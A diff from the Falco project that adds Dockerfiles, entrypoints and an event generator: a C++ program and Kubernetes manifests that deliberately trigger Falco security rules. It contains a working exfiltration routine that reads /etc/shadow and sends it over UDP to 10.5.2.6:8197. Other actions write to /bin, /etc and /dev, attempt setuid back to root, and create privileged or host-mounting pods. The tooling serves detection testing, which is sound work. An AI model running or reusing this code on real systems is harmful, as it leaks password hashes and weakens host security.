+	&& curl -s -o binutils-x86-64-linux-gnu_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/binutils-x86-64-linux-gnu_2.30-22_amd64.deb \
+	&& curl -s -o binutils-common_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/binutils-common_2.30-22_amd64.deb \
+	&& dpkg -i *binutils*.deb \
+	&& rm -f *binutils*.deb
+
+COPY ./docker-entrypoint.sh /
+
+ENTRYPOINT ["/docker-entrypoint.sh"]
+
+CMD ["/usr/bin/falco", "-o", "time_format_iso_8601=true"]

docker/dev/docker-entrypoint.sh

@@ -0,0 +1,34 @@
+#!/usr/bin/env bash
+#
+# Copyright (C) 2019 The Falco Authors.
+#
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+# set -e
+
+# Set the SKIP_MODULE_LOAD variable to skip loading the kernel module
+
+if [[ -z "${SKIP_MODULE_LOAD}" ]]; then
+    echo "* Setting up /usr/src links from host"
+
+    for i in "$HOST_ROOT/usr/src"/*
+    do
+        ln -s "$i" "/usr/src/$i"
+    done
+
+    /usr/bin/falco-probe-loader
+fi
+
+exec "$@"

docker/event-generator/Dockerfile

@@ -0,0 +1,10 @@
+FROM alpine:latest
+LABEL maintainer="opensource@sysdig.com"
+RUN apk add --no-cache bash g++ curl
+COPY ./event_generator.cpp /usr/local/bin
+COPY ./docker-entrypoint.sh ./k8s_event_generator.sh /
+COPY ./yaml /yaml
+RUN mkdir -p /var/lib/rpm
+RUN g++ --std=c++0x /usr/local/bin/event_generator.cpp -o /usr/local/bin/event_generator
+RUN curl -o /usr/local/bin/kubectl -LO https://storage.googleapis.com/kubernetes-release/release/`curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt`/bin/linux/amd64/kubectl && chmod +x /usr/local/bin/kubectl
+ENTRYPOINT ["/docker-entrypoint.sh"]

docker/event-generator/Makefile

@@ -0,0 +1,18 @@
+#
+# Copyright (C) 2019 The Falco Authors.
+#
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+image:
+	docker build -t sysdig/falco-event-generator:latest .

docker/event-generator/docker-entrypoint.sh

@@ -0,0 +1,21 @@
+#!/bin/bash
+
+CMD=${1:-syscall}
+
+shift
+
+set -euo pipefail
+
+if [[ "$CMD" == "syscall" ]]; then
+    /usr/local/bin/event_generator
+elif [[ "$CMD" == "k8s_audit" ]]; then
+    . k8s_event_generator.sh
+elif [[ "$CMD" == "bash" ]]; then
+    bash
+else
+    echo "Unknown command. Can be one of"
+    echo "   \"syscall\": generate falco syscall-related activity"
+    echo "   \"k8s_audit\": generate falco k8s audit-related activity"
+    echo "   \"bash\": spawn a shell"
+    exit 1
+fi

docker/event-generator/event_generator.cpp

@@ -0,0 +1,535 @@
+/*
+Copyright (C) 2019 The Falco Authors.
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+    http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+*/
+
+#include <cstdio>
+#include <utility>
+#include <map>
+#include <set>
+#include <string>
+#include <fstream>
+#include <sstream>
+#include <cstring>
+#include <cstdlib>
+#include <unistd.h>
+#include <getopt.h>
+#include <errno.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/wait.h>
+#include <pwd.h>
+#include <sys/socket.h>
+#include <arpa/inet.h>
+
+using namespace std;
+
+void usage(char *program)
+{
+	printf("Usage %s [options]\n\n", program);
+	printf("Options:\n");
+	printf("     -h/--help: show this help\n");
+	printf("     -a/--action: actions to perform. Can be one of the following:\n");
+	printf("          write_binary_dir                           Write to files below /bin\n");
+	printf("          write_etc                                  Write to files below /etc\n");
+	printf("          read_sensitive_file                        Read a sensitive file\n");
+	printf("          read_sensitive_file_after_startup          As a trusted program, wait a while,\n");
+	printf("                                                     then read a sensitive file\n");
+	printf("          write_rpm_database                         Write to files below /var/lib/rpm\n");
+	printf("          spawn_shell                                Run a shell (bash)\n");
+	printf("                                                     Used by spawn_shell_under_httpd below\n");
+	printf("          spawn_shell_under_httpd                    Run a shell (bash) under a httpd process\n");
+	printf("          db_program_spawn_process                   As a database program, try to spawn\n");
+	printf("                                                     another program\n");
+	printf("          modify_binary_dirs                         Modify a file below /bin\n");
+	printf("          mkdir_binary_dirs                          Create a directory below /bin\n");
+	printf("          change_thread_namespace                    Change namespace\n");
+	printf("          system_user_interactive                    Change to a system user and try to\n");
+	printf("                                                     run an interactive command\n");
+	printf("          network_activity                           Open network connections\n");
+	printf("                                                     (used by system_procs_network_activity below)\n");
+	printf("          system_procs_network_activity              Open network connections as a program\n");
+	printf("                                                     that should not perform network actions\n");
+	printf("          non_sudo_setuid                            Setuid as a non-root user\n");
+	printf("          create_files_below_dev                     Create files below /dev\n");
+	printf("          exec_ls                                    execve() the program ls\n");
+	printf("                                                     (used by user_mgmt_binaries, db_program_spawn_process)\n");
+	printf("          user_mgmt_binaries                         Become the program \"vipw\", which triggers\n");
+	printf("                                                     rules related to user management programs\n");
+	printf("          exfiltration                               Read /etc/shadow and send it via udp to a\n");
+	printf("                                                     specific address and port\n");
+	printf("          all                                        All of the above\n");
+	printf("       The action can also be specified via the environment variable EVENT_GENERATOR_ACTIONS\n");
+	printf("           as a colon-separated list\n");
+	printf("       if specified, -a/--action overrides any environment variables\n");
+	printf("     -i/--interval: Number of seconds between actions\n");
+	printf("     -o/--once: Perform actions once and exit\n");
+}
+
+void open_file(const char *filename, const char *flags)
+{
+	FILE *f = fopen(filename, flags);
+	if(f)
+	{
+		fclose(f);
+	}
+	else
+	{
+		fprintf(stderr, "Could not open %s for writing: %s\n", filename, strerror(errno));
+	}
+}
+
+void exfiltration()
+{
+	ifstream shadow;
+
+	shadow.open("/etc/shadow");
+
+	printf("Reading /etc/shadow and sending to 10.5.2.6:8197...\n");
+
+	if(!shadow.is_open())
+	{
+		fprintf(stderr, "Could not open /etc/shadow for reading: %s", strerror(errno));
+		return;
+	}
+
+	string line;
+	string shadow_contents;
+	while(getline(shadow, line))
+	{
+		shadow_contents += line;
+		shadow_contents += "\n";
+	}
+
+	int rc;
+	ssize_t sent;
+	int sock = socket(PF_INET, SOCK_DGRAM, 0);
+	struct sockaddr_in dest;
+
+	dest.sin_family = AF_INET;
+	dest.sin_port = htons(8197);
+	inet_aton("10.5.2.6", &(dest.sin_addr));
+
+	if((rc = connect(sock, (struct sockaddr *)&dest, sizeof(dest))) != 0)
+	{
+		fprintf(stderr, "Could not bind listening socket to dest: %s\n", strerror(errno));
+		return;
+	}
+
+	if((sent = send(sock, shadow_contents.c_str(), shadow_contents.size(), 0)) != shadow_contents.size())
+	{
+		fprintf(stderr, "Could not send shadow contents via udp datagram: %s\n", strerror(errno));
+		return;
+	}
+
+	close(sock);
+}
+
+void touch(const char *filename)
+{
+	open_file(filename, "w");
+}
+
+void read(const char *filename)
+{
+	open_file(filename, "r");
+}
+
+void become_user(const char *user)
+{
+	struct passwd *pw;
+	pw = getpwnam(user);
+	if(pw == NULL)
+	{
+		fprintf(stderr, "Could not find user information for \"%s\" user: %s\n", user, strerror(errno));
+		exit(1);
+	}
+
+	int rc = setuid(pw->pw_uid);
+
+	if(rc != 0)
+	{
+		fprintf(stderr, "Could not change user to \"%s\" (uid %u): %s\n", user, pw->pw_uid, strerror(errno));
+		exit(1);
+	}
+}
+
+void spawn(const char *cmd, char **argv, char **env)
+{
+	pid_t child;
+
+	// Fork a process, that way proc.duration is reset
+	if((child = fork()) == 0)
+	{
+		execve(cmd, argv, env);
+		fprintf(stderr, "Could not exec to spawn %s: %s\n", cmd, strerror(errno));
+	}
+	else
+	{
+		int status;
+		waitpid(child, &status, 0);
+	}
+}
+
+void respawn(const char *cmd, const char *action, const char *interval)
+{
+	char *argv[] = {(char *)cmd,
+			(char *)"--action", (char *)action,
+			(char *)"--interval", (char *)interval,
+			(char *)"--once", NULL};
+
+	char *env[] = {NULL};
+
+	spawn(cmd, argv, env);
+}
+
+void write_binary_dir()
+{
+	printf("Writing to /bin/created-by-event-generator-sh...\n");
+	touch("/bin/created-by-event-generator-sh");
+}
+
+void write_etc()
+{
+	printf("Writing to /etc/created-by-event-generator-sh...\n");
+	touch("/etc/created-by-event-generator-sh");
+}
+
+void read_sensitive_file()
+{
+	printf("Reading /etc/shadow...\n");
+	read("/etc/shadow");
+}
+
+void read_sensitive_file_after_startup()
+{
+	printf("Becoming the program \"httpd\", sleeping 6 seconds and reading /etc/shadow...\n");
+	respawn("./httpd", "read_sensitive_file", "6");
+}
+
+void write_rpm_database()
+{
+	printf("Writing to /var/lib/rpm/created-by-event-generator-sh...\n");
+	touch("/var/lib/rpm/created-by-event-generator-sh");
+}
+
+void spawn_shell()
+{
+	printf("Spawning a shell to run \"ls > /dev/null\" using system()...\n");
+	int rc;
+
+	if((rc = system("ls > /dev/null")) != 0)
+	{
+		fprintf(stderr, "Could not run ls > /dev/null in a shell: %s\n", strerror(errno));
+	}
+}
+
+void spawn_shell_under_httpd()
+{
+	printf("Becoming the program \"httpd\" and then spawning a shell\n");
+	respawn("./httpd", "spawn_shell", "0");
+}
+
+void db_program_spawn_process()
+{
+	printf("Becoming the program \"mysql\" and then running ls\n");
+	respawn("./mysqld", "exec_ls", "0");
+}
+
+void modify_binary_dirs()
+{
+	printf("Moving /bin/true to /bin/true.event-generator-sh and back...\n");
+
+	if(rename("/bin/true", "/bin/true.event-generator-sh") != 0)
+	{
+		fprintf(stderr, "Could not rename \"/bin/true\" to \"/bin/true.event-generator-sh\": %s\n", strerror(errno));
+	}
+	else
+	{
+		if(rename("/bin/true.event-generator-sh", "/bin/true") != 0)
+		{
+			fprintf(stderr, "Could not rename \"/bin/true.event-generator-sh\" to \"/bin/true\": %s\n", strerror(errno));
+		}
+	}
+}
+
+void mkdir_binary_dirs()
+{
+	printf("Creating directory /bin/directory-created-by-event-generator-sh...\n");
+	if(mkdir("/bin/directory-created-by-event-generator-sh", 0644) != 0)
+	{
+		fprintf(stderr, "Could not create directory \"/bin/directory-created-by-event-generator-sh\": %s\n", strerror(errno));
+	}
+}
+
+void change_thread_namespace()
+{
+	printf("Calling setns() to change namespaces...\n");
+	printf("NOTE: does not result in a falco notification in containers, unless container run with --privileged or --security-opt seccomp=unconfined\n");
+	// It doesn't matter that the arguments to setns are
+	// bogus. It's the attempt to call it that will trigger the
+	// rule.
+	setns(0, 0);
+}
+
+void system_user_interactive()
+{
+	pid_t child;
+
+	printf("Forking a child that becomes user=daemon and then tries to run /bin/login...\n");
+	// Fork a child and do everything in the child.
+	if((child = fork()) == 0)
+	{
+		become_user("daemon");
+		char *argv[] = {(char *)"/bin/login", NULL};
+		char *env[] = {NULL};
+		spawn("/bin/login", argv, env);
+		exit(0);
+	}
+	else
+	{
+		int status;
+		waitpid(child, &status, 0);
+	}
+}
+
+void network_activity()
+{
+	printf("Connecting a udp socket to 10.2.3.4:8192...\n");
+	int rc;
+	int sock = socket(PF_INET, SOCK_DGRAM, 0);
+	struct sockaddr_in localhost;
+
+	localhost.sin_family = AF_INET;
+	localhost.sin_port = htons(8192);
+	inet_aton("10.2.3.4", &(localhost.sin_addr));
+
+	if((rc = connect(sock, (struct sockaddr *)&localhost, sizeof(localhost))) != 0)
+	{
+		fprintf(stderr, "Could not bind listening socket to localhost: %s\n", strerror(errno));
+		return;
+	}
+
+	close(sock);
+}
+
+void system_procs_network_activity()
+{
+	printf("Becoming the program \"sha1sum\" and then performing network activity\n");
+	respawn("./sha1sum", "network_activity", "0");
+}
+
+void non_sudo_setuid()
+{
+	pid_t child;
+
+	printf("Forking a child that becomes \"daemon\" user and then \"root\"...\n");
+
+	// Fork a child and do everything in the child.
+	if((child = fork()) == 0)
+	{
+		// First setuid to something non-root. Then try to setuid back to root.
+		become_user("daemon");
+		become_user("root");
+		exit(0);
+	}
+	else
+	{
+		int status;
+		waitpid(child, &status, 0);
+	}
+}
+
+void create_files_below_dev()
+{
+	printf("Creating /dev/created-by-event-generator-sh...\n");
+	touch("/dev/created-by-event-generator-sh");
+}
+
+void exec_ls()
+{
+	char *argv[] = {(char *)"/bin/ls", NULL};
+	char *env[] = {NULL};
+	spawn("/bin/ls", argv, env);
+}
+
+void user_mgmt_binaries()
+{
+	printf("Becoming the program \"vipw\" and then running the program /bin/ls\n");
+	printf("NOTE: does not result in a falco notification in containers\n");
+	respawn("./vipw", "exec_ls", "0");
+}
+
+typedef void (*action_t)();
+
+map<string, action_t> defined_actions = {{"write_binary_dir", write_binary_dir},
+					 {"write_etc", write_etc},
+					 {"read_sensitive_file", read_sensitive_file},
+					 {"read_sensitive_file_after_startup", read_sensitive_file_after_startup},
+					 {"write_rpm_database", write_rpm_database},
+					 {"spawn_shell", spawn_shell},
+					 {"spawn_shell_under_httpd", spawn_shell_under_httpd},
+					 {"db_program_spawn_process", db_program_spawn_process},
+					 {"modify_binary_dirs", modify_binary_dirs},
+					 {"mkdir_binary_dirs", mkdir_binary_dirs},
+					 {"change_thread_namespace", change_thread_namespace},
+					 {"system_user_interactive", system_user_interactive},
+					 {"network_activity", network_activity},
+					 {"system_procs_network_activity", system_procs_network_activity},
+					 {"non_sudo_setuid", non_sudo_setuid},
+					 {"create_files_below_dev", create_files_below_dev},
+					 {"exec_ls", exec_ls},
+					 {"user_mgmt_binaries", user_mgmt_binaries},
+					 {"exfiltration", exfiltration}};
+
+// Some actions don't directly result in suspicious behavior. These
+// actions are excluded from the ones run with -a all.
+set<string> exclude_from_all_actions = {"spawn_shell", "exec_ls", "network_activity"};
+
+void create_symlinks(const char *program)
+{
+	int rc;
+
+	// Some actions depend on this program being re-run as
+	// different program names like 'mysqld', 'httpd', etc. This
+	// sets up all the required symlinks.
+	const char *progs[] = {"./httpd", "./mysqld", "./sha1sum", "./vipw", NULL};
+
+	for(unsigned int i = 0; progs[i] != NULL; i++)
+	{
+		unlink(progs[i]);
+
+		if((rc = symlink(program, progs[i])) != 0)
+		{
+			fprintf(stderr, "Could not link \"./event_generator\" to \"%s\": %s\n", progs[i], strerror(errno));
+		}
+	}
+}
+
+void run_actions(map<string, action_t> &actions, int interval, bool once)
+{
+	while(true)
+	{
+		for(auto action : actions)
+		{
+			printf("***Action %s\n", action.first.c_str());
+			action.second();
+			sleep(interval);
+		}
+		if(once)
+		{
+			break;
+		}
+	}
+}
+
+int main(int argc, char **argv)
+{
+	map<string, action_t> actions;
+	int op;
+	int long_index = 0;
+	int interval = 1;
+	bool once = false;
+	map<string, action_t>::iterator it;
+
+	static struct option long_options[] =
+		{
+			{"help", no_argument, 0, 'h'},
+			{"action", required_argument, 0, 'a'},
+			{"interval", required_argument, 0, 'i'},
+			{"once", no_argument, 0, 'o'},
+
+			{0, 0}};
+
+	//
+	// Parse the args
+	//
+	while((op = getopt_long(argc, argv,
+				"ha:i:l:o",
+				long_options, &long_index)) != -1)
+	{
+		switch(op)
+		{
+		case 'h':
+			usage(argv[0]);
+			exit(1);
+		case 'a':
+			// "all" is already implied
+			if(strcmp(optarg, "all") != 0)
+			{
+				if((it = defined_actions.find(optarg)) == defined_actions.end())
+				{
+					fprintf(stderr, "No action with name \"%s\" known, exiting.\n", optarg);
+					exit(1);
+				}
+				actions.insert(*it);
+			}
+			break;
+		case 'i':
+			interval = atoi(optarg);
+			break;
+		case 'o':
+			once = true;
+			break;
+		default:
+			usage(argv[0]);
+			exit(1);
+		}
+	}
+
+	//
+	// Also look for actions in the environment. If specified, they
+	// override any specified on the command line.
+	//
+	char *env_action = getenv("EVENT_GENERATOR_ACTIONS");
+
+	if(env_action)
+	{
+		actions.clear();
+
+		string envs(env_action);
+		istringstream ss(envs);
+		string item;
+		while(std::getline(ss, item, ':'))
+		{
+			if((it = defined_actions.find(item)) == defined_actions.end())
+			{
+				fprintf(stderr, "No action with name \"%s\" known, exiting.\n", item.c_str());
+				exit(1);
+			}
+			actions.insert(*it);
+		}
+	}
+
+	if(actions.size() == 0)
+	{
+		for(auto &act : defined_actions)
+		{
+			if(exclude_from_all_actions.find(act.first) == exclude_from_all_actions.end())
+			{
+				actions.insert(act);
+			}
+		}
+	}
+
+	setvbuf(stdout, NULL, _IONBF, 0);
+	setvbuf(stderr, NULL, _IONBF, 0);
+	// Only create symlinks when running as the program event_generator
+	if(strstr(argv[0], "generator"))
+	{
+		create_symlinks(argv[0]);
+	}
+
+	run_actions(actions, interval, once);
+}

docker/event-generator/k8s_event_generator.sh

@@ -0,0 +1,57 @@
+#!/bin/bash
+
+set -euo pipefail
+
+# You can pass a specific falco rule name and only yaml files matching
+# that rule will be considered. The default is "all", meaning all yaml
+# files will be applied.
+
+RULE=${1:-all}
+
+# Replace any '/' in RULES with a '.' and any space with a dash. (K8s
+# label values can not contain slashes/spaces)
+RULE=$(echo "$RULE" | tr '/ ' '.-')
+
+echo "***Testing kubectl configuration..."
+kubectl version --short
+
+while true; do
+
+    RET=$(kubectl get namespaces --output=name | grep falco-event-generator || true)
+
+    if [[ "$RET" == *falco-event-generator* ]]; then
+	echo "***Deleting existing falco-event-generator namespace..."
+	kubectl delete namespace falco-event-generator
+    fi
+
+    echo "***Creating falco-event-generator namespace..."
+    kubectl create namespace falco-event-generator
+
+    for file in yaml/*.yaml; do
+
+	MATCH=0
+	if [[ "${RULE}" == "all" ]]; then
+	    MATCH=1
+	else
+	    RET=$(grep -E "falco.rules:.*${RULE}" $file || true)
+	    if [[ "$RET" != "" ]]; then
+		MATCH=1
+	    fi
+	fi
+
+	if [[ $MATCH == 1 ]]; then
+	    MESSAGES=$(grep -E 'message' $file | cut -d: -f2 | tr '\n' ',')
+	    RULES=$(grep -E 'falco.rules' $file | cut -d: -f2 | tr '\n' ',')
+
+	    # The message uses dashes in place of spaces, convert them back to spaces
+	    MESSAGES=$(echo "$MESSAGES" | tr '-' ' ' | sed -e 's/ *//' | sed  -e 's/,$//')
+	    RULES=$(echo "$RULES" | tr '-' ' '| tr '.' '/' | sed -e 's/ *//' | sed  -e 's/,$//')
+
+	    echo "***$MESSAGES (Rule(s) $RULES)..."
+	    kubectl apply -f $file
+	    sleep 2
+	fi
+    done
+
+    sleep 10
+done

docker/event-generator/yaml/configmap-private-creds.yaml

@@ -0,0 +1,16 @@
+apiVersion: v1
+kind: ConfigMap
+metadata:
+  name: private-creds-configmap
+  namespace: falco-event-generator
+  labels:
+    app.kubernetes.io/name: private-creds-configmap
+    app.kubernetes.io/part-of: falco-event-generator
+    falco.rules: Create.Modify-Configmap-With-Private-Credentials
+    message: Creating-configmap-with-private-credentials
+data:
+  ui.properties: |
+    color.good=purple
+    color.bad=yellow
+    allow.textmode=true
+    password=some_secret_password

docker/event-generator/yaml/disallowed-pod-deployment.yaml

@@ -0,0 +1,25 @@
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: disallowed-pod-deployment
+  namespace: falco-event-generator
+  labels:
+    app.kubernetes.io/name: disallowed-pod-deployment
+    app.kubernetes.io/part-of: falco-event-generator
+    falco.rules: Create-Disallowed-Pod
+    message: Creating-pod-with-image-outside-of-allowed-images
+spec:
+  replicas: 1
+  selector:
+    matchLabels:
+      app.kubernetes.io/name: disallowed-pod-busybox
+  template:
+    metadata:
+      labels:
+        app.kubernetes.io/name: disallowed-pod-busybox
+        app.kubernetes.io/part-of: falco-event-generator
+    spec:
+      containers:
+        - name: busybox
+          image: busybox
+          command: ["/bin/sh", "-c", "while true; do echo sleeping; sleep 3600; done"]

docker/event-generator/yaml/hostnetwork-deployment.yaml

@@ -0,0 +1,26 @@
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: hostnetwork-deployment
+  namespace: falco-event-generator
+  labels:
+    app.kubernetes.io/name: hostnetwork-deployment
+    app.kubernetes.io/part-of: falco-event-generator
+    falco.rules: Create-HostNetwork-Pod
+    message: Creating-deployment-with-hostNetwork-true-pod
+spec:
+  replicas: 1
+  selector:
+    matchLabels:
+      app.kubernetes.io/name: hostnetwork-busybox
+  template:
+    metadata:
+      labels:
+        app.kubernetes.io/name: hostnetwork-busybox
+        app.kubernetes.io/part-of: falco-event-generator
+    spec:
+      hostNetwork: true
+      containers:
+        - name: busybox
+          image: busybox
+          command: ["/bin/sh", "-c", "while true; do echo sleeping; sleep 3600; done"]

docker/event-generator/yaml/nodeport-service.yaml

@@ -0,0 +1,16 @@
+apiVersion: v1
+kind: Service
+metadata:
+  name: nodeport-service
+  namespace: falco-event-generator
+  labels:
+    app.kubernetes.io/name: nodeport-service
+    app.kubernetes.io/part-of: falco-event-generator
+    falco.rules: Create-NodePort-Service
+    message: Creating-service-of-type-NodePort
+spec:
+  type: NodePort
+  ports:
+    - port: 80
+  selector:
+    app: busybox

docker/event-generator/yaml/privileged-deployment.yaml

@@ -0,0 +1,27 @@
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: privileged-deployment
+  namespace: falco-event-generator
+  labels:
+    app.kubernetes.io/name: privileged-deployment
+    app.kubernetes.io/part-of: falco-event-generator
+    falco.rules: Create-Privileged-Pod
+    message: Creating-deployment-with-privileged-true-pod
+spec:
+  replicas: 1
+  selector:
+    matchLabels:
+      app.kubernetes.io/name: privileged-busybox
+  template:
+    metadata:
+      labels:
+        app.kubernetes.io/name: privileged-busybox
+        app.kubernetes.io/part-of: falco-event-generator
+    spec:
+      containers:
+        - securityContext:
+            privileged: true
+          name: busybox
+          image: busybox
+          command: ["/bin/sh", "-c", "while true; do echo sleeping; sleep 3600; done"]

docker/event-generator/yaml/role-pod-exec.yaml

@@ -0,0 +1,17 @@
+apiVersion: rbac.authorization.k8s.io/v1
+kind: Role
+metadata:
+  name: pod-exec-role
+  namespace: falco-event-generator
+  labels:
+    app.kubernetes.io/name: pod-exec-role
+    app.kubernetes.io/part-of: falco-event-generator
+    falco.rules: ClusterRole-With-Pod-Exec-Created
+    message: Creating-role-that-can-exec-to-pods
+rules:
+- apiGroups:
+    - ""
+  resources:
+    - "pods/exec"
+  verbs:
+    - get

docker/event-generator/yaml/role-wildcard-resources.yaml

@@ -0,0 +1,17 @@
+apiVersion: rbac.authorization.k8s.io/v1
+kind: Role
+metadata:
+  name: wildcard-resources-role
+  namespace: falco-event-generator
+  labels:
+    app.kubernetes.io/name: wildcard-resources-role
+    app.kubernetes.io/part-of: falco-event-generator
+    falco.rules: ClusterRole-With-Write-Privileges-Created
+    message: Creating-role-with-wildcard-resources
+rules:
+- apiGroups:
+    - ""
+  resources:
+    - "*"
+  verbs:
+    - get

docker/event-generator/yaml/role-write-privileges.yaml

@@ -0,0 +1,17 @@
+apiVersion: rbac.authorization.k8s.io/v1
+kind: Role
+metadata:
+  name: write-privileges-role
+  namespace: falco-event-generator
+  labels:
+    app.kubernetes.io/name: write-privileges-role
+    app.kubernetes.io/part-of: falco-event-generator
+    falco.rules: ClusterRole-With-Write-Privileges-Created
+    message: Creating-role-with-write-privileges
+rules:
+- apiGroups:
+    - ""
+  resources:
+    - "pods"
+  verbs:
+    - create

docker/event-generator/yaml/sensitive-mount-deployment.yaml

@@ -0,0 +1,32 @@
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: sensitive-mount-deployment
+  namespace: falco-event-generator
+  labels:
+    app.kubernetes.io/name: sensitive-mount-deployment
+    app.kubernetes.io/part-of: falco-event-generator
+    falco.rules: Create-Sensitive-Mount-Pod
+    message: Creating-deployment-with-pod-mounting-sensitive-path-from-host
+spec:
+  replicas: 1
+  selector:
+    matchLabels:
+      app.kubernetes.io/name: sensitive-mount-busybox
+  template:
+    metadata:
+      labels:
+        app.kubernetes.io/name: sensitive-mount-busybox
+        app.kubernetes.io/part-of: falco-event-generator
+    spec:
+      containers:
+        - name: busybox
+          image: busybox
+          command: ["/bin/sh", "-c", "while true; do echo sleeping; sleep 3600; done"]
+          volumeMounts:
+            - mountPath: /host/etc
+              name: etc
+      volumes:
+        - name: etc
+          hostPath:
+            path: /etc

docker/event-generator/yaml/vanilla-configmap.yaml

@@ -0,0 +1,15 @@
+apiVersion: v1
+kind: ConfigMap
+metadata:
+  name: vanilla-configmap
+  namespace: falco-event-generator
+  labels:
+    app.kubernetes.io/name: vanilla-configmap
+    app.kubernetes.io/part-of: falco-event-generator
+    falco.rules: K8s-ConfigMap-Created
+    message: Creating-configmap
+data:
+  ui.properties: |
+    color.good=purple
+    color.bad=yellow
+    allow.textmode=true

docker/event-generator/yaml/vanilla-deployment.yaml

@@ -0,0 +1,25 @@
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: vanilla-deployment
+  namespace: falco-event-generator
+  labels:
+    app.kubernetes.io/name: vanilla-deployment
+    app.kubernetes.io/part-of: falco-event-generator
+    falco.rules: K8s-Deployment-Created
+    message: Creating-deployment
+spec:
+  replicas: 1
+  selector:
+    matchLabels:
+      app.kubernetes.io/name: vanilla-busybox
+  template:
+    metadata:
+      labels:
+        app.kubernetes.io/name: vanilla-busybox
+        app.kubernetes.io/part-of: falco-event-generator
+    spec:
+      containers:
+        - name: busybox
+          image: busybox
+          command: ["/bin/sh", "-c", "while true; do echo sleeping; sleep 3600; done"]

docker/event-generator/yaml/vanilla-role-rolebinding-serviceaccount.yaml

@@ -0,0 +1,46 @@
+apiVersion: rbac.authorization.k8s.io/v1
+kind: Role
+metadata:
+  name: vanilla-role
+  namespace: falco-event-generator
+  labels:
+    app.kubernetes.io/name: vanilla-role
+    app.kubernetes.io/part-of: falco-event-generator
+    falco.rules: K8s-Role.Clusterrole-Created
+    message: Creating-role
+rules:
+- apiGroups:
+    - ""
+  resources:
+    - "pods"
+  verbs:
+    - list
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: RoleBinding
+metadata:
+  name: vanilla-role-binding
+  namespace: falco-event-generator
+  labels:
+    app.kubernetes.io/name: vanilla-role-binding
+    app.kubernetes.io/part-of: falco-event-generator
+    falco.rules: K8s-Role.Clusterrolebinding-Created
+    message: Creating-rolebinding
+roleRef:
+  kind: Role
+  name: vanilla-role
+  apiGroup: rbac.authorization.k8s.io
+subjects:
+  - kind: ServiceAccount
+    name: vanilla-service-account
+---
+apiVersion: v1
+kind: ServiceAccount
+metadata:
+  name: vanilla-serviceaccount
+  namespace: falco-event-generator
+  labels:
+    app.kubernetes.io/name: vanilla-serviceaccount
+    app.kubernetes.io/part-of: falco-event-generator
+    falco.rules: K8s-Serviceaccount-Created
+    message: Creating-serviceaccount

docker/event-generator/yaml/vanilla-service.yaml

@@ -0,0 +1,16 @@
+apiVersion: v1
+kind: Service
+metadata:
+  name: vanilla-service
+  namespace: falco-event-generator
+  labels:
+    app.kubernetes.io/name: vanilla-service
+    app.kubernetes.io/part-of: falco-event-generator
+    falco.rules: K8s-Service-Created
+    message: Creating-service
+spec:
+  type: ClusterIP
+  ports:
+    - port: 80
+  selector:
+    app: busybox

docker/kernel/linuxkit/Dockerfile

@@ -0,0 +1,38 @@
+ARG ALPINE_VERSION=3.10
+ARG KERNEL_VERSION=4.9.184
+ARG FALCO_VERSION=0.19.0
+
+FROM linuxkit/kernel:${KERNEL_VERSION} AS ksrc
+FROM falcosecurity/falco:${FALCO_VERSION}-minimal as falco
+FROM alpine:${ALPINE_VERSION} AS probe-build
+LABEL maintainer="opensource@sysdig.com"
+ARG KERNEL_VERSION=4.9.184
+ARG FALCO_VERSION=0.19.0
+ENV FALCO_VERSION=${FALCO_VERSION}
+ENV KERNEL_VERSION=${KERNEL_VERSION}
+
+COPY --from=ksrc /kernel-dev.tar /
+COPY --from=falco /usr/src/falco-${FALCO_VERSION} /usr/src/falco-${FALCO_VERSION}
+
+RUN apk add --no-cache --update \
+  build-base gcc abuild binutils \
+  bc \
+  autoconf && \
+  export KERNELVER=`uname -r  | cut -d '-' -f 1`  && \
+  export KERNELDIR=/usr/src/linux-headers-${KERNEL_VERSION}-linuxkit/ && \
+  tar xf /kernel-dev.tar && \
+  cd $KERNELDIR && \
+  zcat /proc/1/root/proc/config.gz > .config && \
+  make olddefconfig && \
+  cd /usr/src/falco-${FALCO_VERSION} && \
+  make && \
+  apk del \
+  build-base gcc abuild binutils \
+  bc \
+  autoconf
+
+FROM alpine:${ALPINE_VERSION}
+ARG FALCO_VERSION=0.19.0
+ENV FALCO_VERSION=${FALCO_VERSION}
+COPY --from=probe-build /usr/src/falco-${FALCO_VERSION}/falco-probe.ko /
+CMD ["insmod","/falco-probe.ko"]

docker/kernel/probeloader/Dockerfile

@@ -0,0 +1,18 @@
+FROM golang:1.13-alpine AS build
+ARG FALCOCTL_REF=2be3df92edbac668284fe5c165ccb5bd6bf4e869
+
+RUN apk --no-cache add build-base git gcc ca-certificates
+
+RUN git clone https://github.com/falcosecurity/falcoctl.git /falcoctl
+
+WORKDIR /falcoctl
+
+RUN git checkout ${FALCOCTL_REF}
+RUN go mod vendor
+RUN CGO_ENABLED=0 GOOS=linux go build -a -o falcoctl -ldflags '-extldflags "-static"' .
+
+FROM scratch
